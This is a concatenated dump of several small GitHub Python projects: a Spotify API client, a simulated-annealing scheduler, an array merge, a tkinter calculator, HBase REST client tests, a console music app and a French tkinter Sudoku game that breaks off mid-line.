self.trait_dominating_color(self.images)","repo_name":"mwolanski/RSI-projekt","sub_path":"properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18484000750","text":"## Most of this is from CodingEntrpreneurs on Youtube, \n### My original methods: get_song_id, get_popularity, get_audio_features\n\nimport requests \nimport spotify_cred as sc # Spotify credentials\nimport base64\nfrom urllib.parse import urlencode\nimport datetime as dt\nfrom difflib import SequenceMatcher\n\nclient_id = sc.client_id\nclient_secret = sc.client_secret\n\nclass SpotifyAPI(object):\n access_token = None \n access_token_expires = dt.datetime.now()\n access_token_did_expire = True\n client_id = None \n client_secret = None \n token_url = 'https://accounts.spotify.com/api/token'\n\n \n def __init__(self, client_id, client_secret, *args, **kwargs):\n super().__init__(*args, **kwargs) ## calls any class it inherits from self \n self.client_id = client_id\n self.client_secret = client_secret \n \n def get_client_credentials(self):\n \"\"\"\n Returns base 64 encoded string required for Spotify authentication\n \"\"\"\n client_id = self.client_id\n client_secret = self.client_secret\n \n if client_id == None or client_secret == None:\n raise Exception(\"Client ID and Client Secret must be set.\")\n \n client_cred = f'{client_id}:{client_secret}'\n b64_client_cred = base64.b64encode(client_cred.encode())\n return b64_client_cred.decode()\n \n def get_token_header(self):\n b64_client_cred = self.get_client_credentials()\n token_headers = {\n 'Authorization': f\"Basic {b64_client_cred}\", \n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n return token_headers\n \n def get_token_data(self):\n token_data = {\n 'grant_type': 'client_credentials'\n }\n return token_data\n \n def perform_auth(self):\n token_url = self.token_url\n token_data = self.get_token_data()\n token_headers = self.get_token_header()\n r = requests.post(token_url, data=token_data, headers=token_headers)\n \n if r.status_code not in range(200,299):\n return False\n \n token_response_data = r.json()\n now = dt.datetime.now()\n access_token = token_response_data['access_token']\n expires_in = token_response_data['expires_in']\n expires = now + dt.timedelta(seconds=expires_in)\n self.access_token = access_token\n self.access_token_expires = expires\n self.access_token_did_expire = expires < now\n return True\n \n def get_access_token(self):\n auth_done = self.perform_auth\n if not auth_done:\n raise Exception(\"Authentication failed.\")\n \n token = self.access_token \n expires = self.access_token_expires\n now = dt.datetime.now()\n \n if expires < now:\n self.perform_auth()\n return self.get_access_token()\n elif token == None:\n self.perform_auth()\n return self.get_access_token()\n \n return token \n \n def get_track_header(self):\n access_token = self.get_access_token()\n headers = {\n \"Authorization\": f\"Bearer {access_token}\"\n } \n return headers\n \n # not be necessary\n \"\"\"\n def get_track(self, lookup_id):\n endpoint = f\"https://api.spotify.com/v1/tracks/{lookup_id}\"\n headers = self.get_track_header()\n r = requests.get(endpoint, headers=headers)\n if r.status_code not in range(200,299):\n return {}\n return r.json()\n \"\"\"\n \n def get_song_id(self, song_name, artist_name):\n search_dict = self.search(song_name)\n song_id = None\n popularity = None\n \n track_items = search_dict['tracks']['items']\n for i in track_items:\n if artist_name[:5] in i['artists'][0]['name'] or SequenceMatcher(None, artist_name, i['artists'][0]['name']).ratio() >= 0.45:\n song_id = i['id']\n popularity = i['popularity']\n else:\n continue\n return song_id, popularity\n \n def get_popularity(self, song_name, artist_name):\n popularity = self.get_song_id(song_name, artist_name)[1]\n return popularity\n \n def get_audio_features(self, song_name, artist_name):\n song_id, popularity = self.get_song_id(song_name, artist_name)\n endpoint = f'https://api.spotify.com/v1/audio-features/{song_id}'\n headers = self.get_track_header()\n r = requests.get(endpoint, headers=headers)\n if r.status_code not in range(200,299):\n return {}\n return r.json()\n \n def search(self, query, search_type=\"track\"):\n query = query.lower().replace(' ', '+')\n access_token = self.access_token\n endpoint = \"https://api.spotify.com/v1/search\"\n headers = self.get_track_header()\n \n data = urlencode({'q': query, 'type':search_type.lower()})\n lookup_url = f\"{endpoint}?{data}\"\n \n r = requests.get(lookup_url, headers=headers)\n if r.status_code not in range(200,299):\n return {}\n return r.json()","repo_name":"chrisnish4/billboard_100_sentiment","sub_path":"spotify_api_client.py","file_name":"spotify_api_client.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40577053958","text":"import data\nimport random\nimport sys\nimport math\nimport time\n\nProcesses = data.tmp.copy()\nN = data.n\nM = data.m\n\nT0 = 100 #100 1000 10000\nL = N #int(math.sqrt(N)) #N N*N\nx = T0/100000 #T0/10000 T0/100000\nalpha = 0.97 #0,95 0,90\nTend = 1 #0.01 #0.001 0.0001\nrm = 'g' #'l' 'g' 'i'\nmm = 't' # 's' 'i' 't' 'a'\n\ndef Cmax(CProcesses):\n Cstart = 0\n Cend = 0\n endList = [[0 for i in range(len(CProcesses[0]))] for j in range(len(CProcesses))]\n startList = [[0 for i in range(len(CProcesses[0]))] for j in range(len(CProcesses))]\n for i in range(0, len(CProcesses)):\n for j in range(0, len(CProcesses[0])):\n if(i == 0):\n Cstart = Cend\n Cend = Cstart + CProcesses[i][j]\n else:\n if(j == 0):\n Cstart = endList[i-1][j]\n else:\n Cstart = max(endList[i-1][j], Cend)\n Cend = Cstart + CProcesses[i][j]\n\n startList[i][j] = Cstart\n endList[i][j] = Cend\n return endList[len(CProcesses)-1][len(CProcesses[0])-1]\n\n#ChilleraUtopia\n\ndef deltaCmac(pi, pi_new):\n return Cmax(pi)-Cmax(pi_new)\n\ndef probability(pi, pi_new, T):\n delta = deltaCmac(pi, pi_new)\n prob = math.exp(delta/T)\n return prob\n\ndef chillLinear(T, x):\n Ice_Cold_T = T - x\n return float(Ice_Cold_T)\n\ndef chillGeometric(T, alpha):\n Ice_Cold_T = T*alpha\n return float(Ice_Cold_T)\n\ndef chillLog(T, iterator):\n Ice_Cold_T = T/math.log(iterator+1)\n return float(Ice_Cold_T)\n\ndef moveMethod(mm, i, j, pi):\n if mm == 's':\n for x in range (M):\n pi[i][x], pi[j][x] = pi[j][x], pi[i][x]\n #prosta zamiana \n return pi\n\n elif mm == 'i':\n for x in range(M):\n temp = pi[i][x]\n for y in range(N):\n if y < j and y < i: #elementy są przed wyciąganym i jego miejscem\n pass\n elif y < j and y > i: #elemetny pomiędzy elementem wyciągniętym i jego miejscem\n pi[y][x] = pi [y-1][x]\n elif y > j and y < i: #elementy pomiędzy miejscem i elementem wyciągniętym\n pi[y][x] = pi [y+1][x]\n elif y > j and y > i: #elementy po miejscach interaktywych\n pass\n else:\n pass\n return pi\n\n elif mm == 't':\n if i > j:\n a = j\n b = i\n else:\n a = i\n b = j #przypisuje na przyszłość indeksy do wygodniejszego używania\n\n for x in range(M):\n while a < b:\n pi[a][x], pi[b][x] = pi[b][x], pi[a][x] #podmienia elementy\n a = i + 1 #przemieszcza indeksy\n b = b - 1\n return pi\n\n elif mm == 'a':\n first = pi[i][0]\n for x in range (1,M):\n if x == M-1 :\n pi[i][x] = first #zapamiętuje pierwszy element\n else: \n pi[i][x] = pi[i][x-1] #cofa każdy z elementów\n return pi\n\n else:\n pass\n\ndef reduceMethod(rm, T, iterator):\n if rm == 'l':\n chill_Lin = chillLinear(T, x)\n return chill_Lin\n elif rm == 'g':\n chill_Geo = chillGeometric(T, alpha)\n return chill_Geo\n elif rm == 'i':\n chill_Log = chillLog(T, iterator)\n return chill_Log\n else:\n pass\n\ndef SAA():\n pi = Processes.copy()\n pi_best = pi \n T = T0\n iterator = 0\n while T > Tend:\n for k in range(1,L):\n i = random.randint(1,N-1)\n j = random.randint(1,N-1)\n pi_new = moveMethod(mm,i,j,pi)\n if Cmax(pi_new) > Cmax(pi):\n r = random.random()\n p = probability(pi, pi_new)\n if r >= p:\n pi_new = pi\n pi = pi_new\n if Cmax(pi) < Cmax(pi_best):\n pi_best = pi\n iterator += 1\n #print (iterator)\n T = reduceMethod(rm, T, iterator)\n return pi_best\n\nstart = time.time()\nprint (Cmax(SAA()))\nend = time.time()\nT = end - start\nprint(T)","repo_name":"Cassie051/CDP","sub_path":"task4/lab10.py","file_name":"lab10.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38614510835","text":"class CombineArray:\r\n def __init__(self,l1,l2):\r\n self.ary1 = l1\r\n self.ary2 = l2\r\n\r\n # def combine(self):\r\n # result = [] + self.ary1 + self.ary2\r\n # result.sort() #O(nlogn)\r\n # return result\r\n\r\n def combine(self):#O(n)\r\n result = []\r\n i,j = 0,0\r\n while(i < len(self.ary1) and j < len(self.ary2)):\r\n if(self.ary1[i] <= self.ary2[j]):\r\n result.append(self.ary1[i])\r\n i += 1\r\n else:\r\n result.append(self.ary2[j])\r\n j += 1\r\n while i < len(self.ary1):\r\n result.append(self.ary1[i])\r\n i += 1\r\n \r\n while j < len(self.ary2):\r\n result.append(self.ary2[j])\r\n j += 1\r\n #result += self.ary2[j:]\r\n\r\n return result\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n Comb = CombineArray([1,2,4],[1,3,4])\r\n result = Comb.combine()\r\n print(result)\r\n","repo_name":"francs1/leetcode_basic_60","sub_path":"leetcode入门60题/05链表/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34384749459","text":"from tkinter import *\n\n\ndef frame(master):\n w = Frame(master)\n w.pack(side=TOP, expand=YES, fill=BOTH)\n return w\n\n\ndef button(master, text, command):\n w = Button(master, text=text, command=command, width=6)\n w.pack(side=LEFT, expand=YES, fill=BOTH, padx=2, pady=2)\n return w\n\n\ndef back(text):\n if len(text) > 0:\n return text[:-1]\n else:\n return text\n\n\ndef calculate(text):\n try:\n return eval(text)\n except (SyntaxError, ZeroDivisionError, NameError):\n return 'Error'\n\n\nroot = Tk()\nroot.title(\"Calculator v 0.1\")\ntext = StringVar()\n\nEntry(root, textvariable=text).pack(expand=YES, fill=BOTH, padx=2, pady=4)\n\nfirstRow = frame(root)\nbutton(firstRow, 'BS', lambda t=text: t.set(back(t.get())))\nbutton(firstRow, 'C', lambda t=text: t.set(''))\nbutton(firstRow, '(', lambda t=text: t.set(t.get() + '('))\nbutton(firstRow, ')', lambda t=text: t.set(t.get() + ')'))\n\nfor keyStr in ('789/', '456*', '123-', '0.=+'):\n buttonPanel = frame(root)\n for opName in keyStr:\n if opName == '=':\n button(buttonPanel, opName, lambda t=text: t.set(calculate(t.get())))\n else:\n button(buttonPanel, opName, lambda t=text,\n c=opName: t.set(t.get() + c))\n\nroot.mainloop()\n","repo_name":"Aric-Zhang/PyScripts","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"769290885","text":"import json\nimport responses\nfrom unittest import TestCase\nfrom mock import patch\nfrom hbase.rest_client import HBaseRESTClient\n\n\nclass TestRESTClient(TestCase):\n def setUp(self):\n self.client = HBaseRESTClient(hosts_list=[\"http://localhost:8080\"])\n\n def tearDown(self):\n self.client.session.close()\n\n def test_get_hbase_host(self):\n assert self.client.get_hbase_host() == \"http://localhost:8080\"\n\n @patch(\"requests.Session.get\")\n def test_GET_method(self, mocked_fnc):\n self.client.send_request(\"GET\", \"/test\")\n mocked_fnc.assert_called_with(\n url=\"http://localhost:8080/test\",\n headers={\"accept\": \"application/json\", \"content-type\": \"application/json\"},\n timeout=10,\n )\n\n @patch(\"requests.Session.post\")\n def test_POST_method(self, mocked_fnc):\n self.client.send_request(\"POST\", \"/test\", {\"a\": 1})\n mocked_fnc.assert_called_with(\n url=\"http://localhost:8080/test\",\n data='{\"a\": 1}',\n headers={\"accept\": \"application/json\", \"content-type\": \"application/json\"},\n timeout=10,\n )\n\n @patch(\"requests.Session.put\")\n def test_PUT_method(self, mocked_fnc):\n self.client.send_request(\"PUT\", \"/test\", {\"a\": 1})\n mocked_fnc.assert_called_with(\n url=\"http://localhost:8080/test\",\n data='{\"a\": 1}',\n headers={\"accept\": \"application/json\", \"content-type\": \"application/json\"},\n timeout=10,\n )\n\n @patch(\"requests.Session.delete\")\n def test_DELETE_method(self, mocked_fnc):\n self.client.send_request(\"DELETE\", \"/test\")\n mocked_fnc.assert_called_with(\n url=\"http://localhost:8080/test\",\n headers={\"accept\": \"application/json\", \"content-type\": \"application/json\"},\n timeout=10,\n )\n\n @responses.activate\n def test_send_request_success(self):\n expected = {\"table\": [{\"name\": \"message\"}, {\"name\": \"new_table\"}]}\n responses.add(\n responses.GET,\n \"http://localhost:8080/namespaces/default/tables\",\n json=expected,\n status=200,\n )\n result = self.client.send_request(\n method=\"GET\", url_suffix=\"/namespaces/default/tables\"\n )\n assert json.loads(result) == expected\n\n @responses.activate\n def test_send_request_failedd(self):\n payload = \"Bad request\"\n responses.add(\n responses.GET,\n \"http://localhost:8080/namespaces/default/tables\",\n json=payload,\n status=400,\n )\n result = self.client.send_request(\n method=\"GET\", url_suffix=\"/namespaces/default/tables\"\n )\n assert result == {\"error\": '\"Bad request\"', \"status_code\": 400}\n","repo_name":"samirMoP/hbase-rest-py","sub_path":"hbase/test/test_rest_client.py","file_name":"test_rest_client.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"3491947490","text":"import time\n\nfrom music import *\n\ndb = Database()\nmusic = Music()\nwhile True:\n print(\"\"\"\n******************************************\nChoose Your Operation\n1-Display All Musics\n2-Add Music\n3-Delete Music\n4-Display Total Time Of All Musics\npress q to quit.\n******************************************\n \"\"\")\n op = input(\"\")\n if op == \"1\":\n music.display_musics()\n elif op == \"2\":\n name = input(\"Music name : \")\n name = name.upper()\n minute = int(input(\"Minute: \"))\n second = int(input(\"Second: \"))\n date = input(\"Date: \")\n print(\"Music adding...\")\n time.sleep(1)\n music.add_music(name, minute, second, date)\n print(\"Music added !\")\n time.sleep(1)\n elif op == \"3\":\n name = input(\"Music name : \")\n name = name.upper()\n conf = input(\"Are You Sure ? (y/n)\")\n if conf == \"y\":\n print(\"Music deleting...\")\n time.sleep(1)\n music.delete_music(name)\n print(\"Music deleted !\")\n time.sleep(1)\n elif conf == \"n\":\n print(\"Returning to the main menu...\")\n time.sleep(1)\n continue\n else:\n print(\"Invalid input ! Returning to the main menu...\")\n time.sleep(1)\n elif op == \"4\":\n print(\"Calculating total time...\")\n time.sleep(1)\n music.calculate_total_time()\n elif op == \"q\":\n print(\"Exiting..\")\n time.sleep(1)\n break\n else:\n print(\"Invalid input ! Returning to the main menu...\")\n time.sleep(1)\n continue\n","repo_name":"yusufs-d/Python-Projects","sub_path":"Music_App/music_app.py","file_name":"music_app.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32408185878","text":"import tkinter as tk\nfrom tkinter import messagebox\nimport random\nfrom tkinter import *\n\n# Création de la fenêtre principale\nfenetre = tk.Tk()\nfenetre.title(\"Sudoku1Shot\")\n\nCanvas_Width = 740 # Cela permet de bien rendre la fenetre avec de bonne couleur et les boutons et fond bien visible \nCanvas_Height = 400\n\nfenetre.geometry(\"740x400\") #permet de s'assurer que la fenêtre a la bonne taille pour le canevas.\n\nSudoku_Canvas = Canvas(fenetre,bg='#CCCCCC', width= Canvas_Width, height= Canvas_Height) #paramètre bg fixé à \"#CCCCCC\" pour un fond gris clair\nSudoku_Canvas.grid(column=0,row=0,columnspan=20,rowspan=20) #Le widget canvas est placé dans la fenêtre tkinter à l'aide de la méthode grid()\n\n\ngrille_principale = []\nnb_erreurs=0\ndef recommencer_parti():\n global grille_principale, nb_erreurs, temps #signifie que toute modification apportée à cette variable à l'intérieur de la fonction est sauvegarder\n global nb_contraintes, essais_user, nb_cliques, essaie_possible, essaie_utilise #affectera la variable globale du même nom à l'extérieur de la fonction.\n\n temps_label.config(text=\"Temps: 00:00\") # mettre à jour le label pour afficher le temps à 0\n nb_erreurs_label.config(text=\"Erreurs: 0\")\n nb_contraintes_label.config(text=\"Contraintes: 0\")\n essais_restants_label.config(text=\"Essais restants: 5\")\n nb_aleatoire_label.config(text=\"Essais: 5\")\n afficher_erreurs_bouton.config(state='normal')\n aide_bouton.config(state='normal')\n essais_user=0\n essaie_utilise=0\n temps = 0\n nb_erreurs=0\n nb_cliques=0\n essaie_possible=0\n nb_contraintes=0\n\n for ligne in grille_principale: #itère sur chaque ligne de la grille du puzzle.\n for cellule in ligne: #itère sur chaque cellule de la ligne courante.\n #efface le contenu de la cellule courante. \n cellule.delete(0, tk.END)\n #définit la police de caractères de la cellule à \"Arial\" et la taille de police à 10 points. \n cellule.config(font=(\"Arial\", 10))\n #définit l'état de la cellule courante à \"normal\", ce qui signifie que le joueur peut y entrer une valeur\n cellule.config(state=\"normal\") \n grille_principale = cree_grille() #génère une nouvelle grille de puzzle et l'assigne à \"grille_principale\".\n\n# Ajout d'un bouton pour redémarrer le jeu\nrestart_bouton = tk.Button(fenetre, text=\"Redémarrer\", command=recommencer_parti)\nrestart_bouton.grid(row=3, column=12)\n\n\nnb_cliques = 0\nessais_user=0\ndef afficher_contraintes():\n global grille_principale, nb_contraintes, nb_cliques, essais_user\n nb_contraintes = 0\n nb_cliques += 1\n essais_user += 1\n\n if nb_cliques == 5:\n afficher_erreurs_bouton.config(state=tk.DISABLED) #Désactiver le bouton lorsque on appuis 5 fois dessus.\n \n # Vérification des contraintes dans chaque ligne\n for l in range(9):\n colonne = []\n # Vérification des contraintes dans chaque colonne\n for c in range(9):\n valeur = grille_principale[c][l].get()\n if valeur != \"\":\n # La valeur existe déjà dans cette colonne\n if valeur in colonne:\n\n for i in range(9):\n if grille_principale[i][l].get() == valeur:\n grille_principale[i][l].config(bg=\"red\")\n nb_contraintes+=1\n else:\n colonne.append(valeur) #permet de mémoriser pour plus tard ou sont placer les doublons\n \n ligne = []\n\n for c in range(9):\n valeur = grille_principale[l][c].get()\n if valeur == \"\" or not valeur.isdigit() or int(valeur) < 1 or int(valeur) > 9: # vérifie si l'utilisateur a saisie une valeur correct \n grille_principale[l][c].config(bg=\"red\")\n nb_contraintes+=1\n else:\n grille_principale[l][c].config(bg=\"white\") #la couleur de fond de la cellule est fixée au blanc pour indiquer qu'elle respecte les contraintes.\n\n if valeur != \"\":\n # La valeur existe déjà dans cette ligne\n if valeur in ligne:\n\n for i in range(9):\n if grille_principale[l][i].get() == valeur:\n grille_principale[l][i].config(bg=\"red\")\n nb_contraintes+=1\n else:\n # Si la valeur ne figure pas dans la liste de lignes, elle l'ajoute à la liste pour vérification ultérieure.\n ligne.append(valeur) # permet de vérifier si une valeur apparaît déjà dans la ligne et dc pas de doublons.\n \n # Vérification des contraintes dans chaque carré\n carre = []\n ligne = (l // 3) * 3 #En divisant l par 3 à l'aide de la division entière on obtient l'indice du carré 3x3 correspondant.\n colonne = (l % 3) * 3 # En multipliant cette valeur par 3, on obtient l'indice de la ligne de départ de ce carré.\n\n for l in range(ligne, ligne + 3):\n for c in range(colonne, colonne + 3):\n valeur = grille_principale[l][c].get()\n if valeur != \"\": #la cellule n'est pas vide\n # La valeur existe déjà dans ce carre\n if valeur in carre:\n \n for i in range(ligne, ligne + 3):\n for j in range(colonne, colonne + 3):\n if grille_principale[i][j].get() == valeur:\n grille_principale[i][j].config(bg=\"red\")\n nb_contraintes+=1\n else:\n carre.append(valeur)\n\n nb_contraintes_label.config(text=f\"Contraintes: {nb_contraintes}\") # mettre à jour le label pour afficher le nombre de containtes à chaque appel de la fonction.\n essais_restants = 5 - essais_user\n essais_restants_label.config(text=\"Essais restants: {}\".format(essais_restants))\n\n# Création d'un bouton pour afficher les contraintes\nafficher_erreurs_bouton = tk.Button(fenetre, text=\"Afficher les contraintes\", command=afficher_contraintes)\nafficher_erreurs_bouton.grid(row=8, column=12)\n\nnb_contraintes_label = tk.Label(fenetre, text=\"Contraintes: 0\")\nnb_contraintes_label.grid(row=9, column=12)\n\nessais_restants_label = tk.Label(fenetre, text=\"Essais restants: 5\")\nessais_restants_label.grid(row=6, column=12)\n\n\n# Fonction pour mettre à jour le temps toutes les secondes\ntemps=0 # Ajout de la variable temps à zéro\ndef timer_maj():\n global temps\n temps += 1\n # les minutes obtenues par la division entière par 60 et les secondes étant le reste divisée par 60.\n temps_label.config(text=\"Temps: {:02d}:{:02d}\".format(temps // 60, temps % 60))\n # planifie l'appel de la fonction timer_maj() toutes les secondes\n fenetre.after(1000, timer_maj)\n\n# Lancer la fonction pour mettre à jour le temps toutes les secondes, garantit que c'est mise à jour toutes les secondes pour afficher le temps écoulé.\nfenetre.after(1000, timer_maj)\n\n# Ajout d'un label pour afficher le temps\ntemps_label = tk.Label(fenetre, text=\"Temps: 00:00\")\ntemps_label.grid(row=0, column=12)\n\n\ndef creation_grille_aleatoire():\n base = 3\n cote = base*base\n\n # modèle de solution valable pour la ligne de base\n def grille_predefini(l,c): \n return (base*(l%base)+l//base+c)%cote # calcule l'indice d'une cellule en fonction de ses indices de ligne et de colonne.\n\n # choisir des valeurs aléatoire pour les lignes, les colonnes et les nombres\n def randint(s): \n return random.sample(s,len(s)) # utilisée pour mélanger les indices de ligne et de colonne et les valeurs possibles des cellules par la suite.\n \n # Elle est utilisée pour générer les valeurs de ligne et de colonne pour chaque case de la grille.\n base_unique = range(base) \n lignes = [ j*base + l for j in randint(base_unique) for l in randint(base_unique) ] \n colonnes = [ j*base + c for j in randint(base_unique) for c in randint(base_unique) ]\n valeurs = randint(range(1,base*base+1)) # représente les valeurs possibles qui peuvent être remplies dans chaque cellule de la grille.\n\n # créer une grille de sudoku en utilisant un modèle de base aléatoire\n grille = [ [valeurs[grille_predefini(r,c)] for c in colonnes] for r in lignes ]\n return grille\n\n\n# Fonction pour créer la grille de sudoku\ndef cree_grille():\n # Création d'une grille de 9x9 cases (celle de base dans le jeu sudoku)\n grille_cree = []\n # crée une liste de listes, où chaque liste représente une ligne de la grille et contient des widgets Entry individuels pour chaque cellule de la ligne.\n for ligne in range(9):\n # Créer une nouvelle ligne pour la grille\n ligne_cree = []\n\n for colonne in range(9):\n # Créer un nouveau compartiment pour la grille, pour chaque case de la grille, une entrée est créée\n compartiment = tk.Entry(fenetre, justify=\"center\", width=6, font=(\"Arial\", 10))\n\n # Calculer l'indice de la région correspondant à la case\n region_ligne = ligne // 3\n region_colonne = colonne // 3\n region_ligne2 = ligne // 6\n region_colonne2 = colonne // 6\n region_ligne3 = ligne // 9\n region_colonne3 = colonne // 9\n\n # Le positionner dans la grille en fonction de son indice de région\n compartiment.grid(row=ligne + region_ligne + region_ligne2 + region_ligne3, column=colonne+region_colonne + region_colonne2 + region_colonne3, padx=4, pady=4)\n #Les entrées sont stockées dans une liste row pour chaque ligne, qui est ensuite ajoutée à la liste grid pour former la grille complète.\n \n # Ajouter la case à la ligne\n ligne_cree.append(compartiment)\n\n # Ajouter la ligne à la grille , la grille entière est construite ligne par ligne, chaque nouvelle ligne étant ajoutée à la liste grille_cree.\n grille_cree.append(ligne_cree)\n\n # Création de la grille de sudoku en ajoutant grille_principale a la fonction \n grille_defini = creation_grille_aleatoire()\n\n # retirer aléatoirement des chiffres de la grille complétée pour créer une grille de Sudoku résoluble\n for i in range(81):\n # calculer les indices de colonne et de ligne pour chaque cellule de la grille en fonction de l'indice i\n colonne = i % 9 \n ligne = i // 9 # obtient la cellule correspondante dans la liste grille_cree à l'aide de ces indices.\n cellule = grille_cree[colonne][ligne]\n \n if random.random() < 0.4: \n # supprimer des nombres sélectionnés au hasard dans une grille de Sudoku complétée afin de créer une grille résoluble.\n cellule.delete(0, tk.END) # supprimer le contenu de la cellule, en commençant par l'index 0 jusqu'à tk.END\n else: \n #utilisée pour insérer une valeur dans un widget Tkinter, utilisée pour insérer un nombre dans la cellule, à partir de l'index 0. \n cellule.insert(0, str(grille_defini[ligne][colonne])) \n #définir l'option state du widget cellule sur \"disabled\", ce qui empêche l'utilisateur de modifier la valeur de la cellule.\n cellule.config(state=\"disabled\")\n\n # retourné la grille \n return grille_cree\n\n# Création de la grille de sudoku en ajoutant grille_principale a la fonction\ngrille_principale = cree_grille()\n\n\n# Fonction pour vérifier la grille de sudoku\ndef verifie_grille():\n global nb_erreurs\n \n for l in range(9):\n for c in range(9):\n \n valeur = grille_principale[l][c].get()\n if valeur == \"\" or not valeur.isdigit() or int(valeur) < 1 or int(valeur) > 9:\n messagebox.showerror(\"Erreur\", \"Il manque une valeur dans la case ou elle ne respecte pas les contrainte du jeu ({}, {}).\".format(l+1, c+1)) #vide ou valeur invalide\n nb_erreurs += 1\n \n # Mise à jour du nombre d'erreurs\n nb_erreurs_label.config(text=\"Erreurs: {}\".format(nb_erreurs))\n return\n\n for l in range(9):\n\n nombre_ligne = set() #utilisé pour stocker les chiffres uniques trouvés dans une ligne particulière de la grille de Sudoku.\n nombre_colone = set() #La fonction itère sur chaque cellule de la ligne et ajoute la valeur de chaque cellule à l'ensemble nombre colone...\n nombre_carre = set() #trie dans l'ordre croissant une liste de chiffre et supprime les doublons\n\n for c in range(9):\n # Vérifier la colonne c\n\n if grille_principale[c][l].get() in nombre_colone:\n messagebox.showerror(\"Erreur\", \"Il y a une erreur dans la colonne {}.\".format(l+1))\n nb_erreurs += 1\n \n # Mise à jour du nombre d'erreurs\n nb_erreurs_label.config(text=\"Erreurs: {}\".format(nb_erreurs))\n return\n nombre_colone.add(grille_principale[c][l].get()) #ajoute la valeur de la cellule de la grille à \"nombre_colone\"\n\n # Vérifier la ligne l\n\n if grille_principale[l][c].get() in nombre_ligne:\n messagebox.showerror(\"Erreur\", \"Il y a une erreur dans la ligne {}.\".format(l+1))\n nb_erreurs += 1\n \n # Mise à jour du nombre d'erreurs\n nb_erreurs_label.config(text=\"Erreurs: {}\".format(nb_erreurs))\n return\n nombre_ligne.add(grille_principale[l][c].get())\n\n # Vérifier le carre 3x3 (l // 3, l % 3)\n carre_ligne = (l // 3) * 3 + c // 3\n carre_colone = (l % 3) * 3 + c % 3\n\n if grille_principale[carre_ligne][carre_colone].get() in nombre_carre:\n messagebox.showerror(\"Erreur\", \"Il y a une erreur dans le carre ({}, {}).\".format(l // 3 + 1, l % 3 + 1))\n nb_erreurs += 1\n \n # Mise à jour du nombre d'erreurs\n nb_erreurs_label.config(text=\"Erreurs: {}\".format(nb_erreurs))\n return\n nombre_carre.add(grille_principale[carre_ligne][carre_colone].get())\n \n \n messagebox.showinfo(\"Tu as terminé en\", \"Temps: {:02d}:{:02d}\".format(temps // 60, temps % 60))\n messagebox.showinfo(\"Erreurs\", \"Tu as fait {} erreur(s) durant cette parti.\".format(nb_erreurs))\n messagebox.showinfo(\"Bien joué\", \"La grille de Sudoku est correcte !\")\n\n# Création du bouton de vérification\nbouton_verif = tk.Button(fenetre, text=\"Vérifier\", command=verifie_grille)\nbouton_verif.grid(row=12, column=5)\n\nnb_erreurs_label = tk.Label(fenetre, text=\"Erreurs: 0\")\nnb_erreurs_label.grid(row=13, column=5)\n\n\ndef couleur_de_base():\n global grille_principale\n for l in range(9):\n for c in range(9):\n grille_principale[l][c].config(bg=\"white\")\n\nbase_couleur_bouton = tk.Button(fenetre, text=\"Rénitialiser les couleurs\", command=couleur_de_base)\nbase_couleur_bouton.grid(row=11, column=12)\n\n\ndef quitter_partie():\n if messagebox.askyesno(\"J'arrete\", \"Veux-tu réelement quitter la parti ?\"): #Demander une question\n fenetre.destroy() # détruit la fenêtre principale de l'application et quitte le programme.\n\nquitter_bouton = tk.Button(fenetre, text=\"Quitter\", command=quitter_partie)\nquitter_bouton.grid(row=12, column=7)\n\n'''\ndef indice_aleatoire():\n global grille_principale\n\n # Choisir une cellule vide aléatoirement\n #crée une compréhension de liste qui parcourt toutes les cellules de la grille et ajoute les valeurs de toutes les cellules vides à la liste cellules_vides.\n cellules_vides = [(l, c) for l in range(9) for c in range(9) if grille_principale[l][c].get() == \"\"]\n\n if cellules_vides:\n ligne, colonne = random.choice(cellules_vides)\n # Insérer une valeur aléatoire entre 1 et 9\n valeur = random.randint(1, 9)\n grille_principale[ligne][colonne].insert(0, valeur)\n \n else:\n messagebox.showerror(\"Erreur\", \"Il n'y a plus de cases vides!\")\n\nindice_bouton = tk.Button(fenetre, text=\"Indices\\npiégers\", command=indice_aleatoire)\nindice_bouton.grid(row=12, column=3)\n'''\n\nessaie_possible=0\nessaie_utilise=0\ndef indice_juste():\n global grille_principale, essaie_possible, essaie_utilise\n essaie_possible+=1\n essaie_utilise+=1\n if essaie_possible == 5:\n aide_bouton.config(state=tk.DISABLED)\n\n # Trouver une cellule vide aléatoirement\n i = random.randint(0, 8) #génèrent des indices aléatoires (i et j) jusqu'à ce qu'une cellule vide soit trouvée dans la grille_principale.\n j = random.randint(0, 8)\n while grille_principale[i][j].get() != \"\":\n i = random.randint(0, 8)\n\n # Trouver une valeur valide pour la cellule\n valeurs_correct = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n \n for l in range(9):\n if grille_principale[l][j].get() in valeurs_correct:\n valeurs_correct.remove(grille_principale[l][j].get()) #indice l est utilisé pour sélectionner la ligne, et j pour la colonne.\n if grille_principale[i][l].get() in valeurs_correct:\n valeurs_correct.remove(grille_principale[i][l].get()) #grille_principale est une liste bidimensionnelle valide avec au moins l lignes et j colonne\n \n # Remplir la cellule avec la valeur choisie aléatoirement\n if valeurs_correct:\n valeur = random.choice(valeurs_correct)\n grille_principale[i][j].insert(0, valeur)\n\n nb_aleatoire = 5 - essaie_utilise\n nb_aleatoire_label.config(text=\"Essais: {}\".format(nb_aleatoire))\n\n# Ajout d'un bouton pour obtenir de l'aide\naide_bouton = tk.Button(fenetre, text=\"Valeurs\", command=indice_juste)\naide_bouton.grid(row=12, 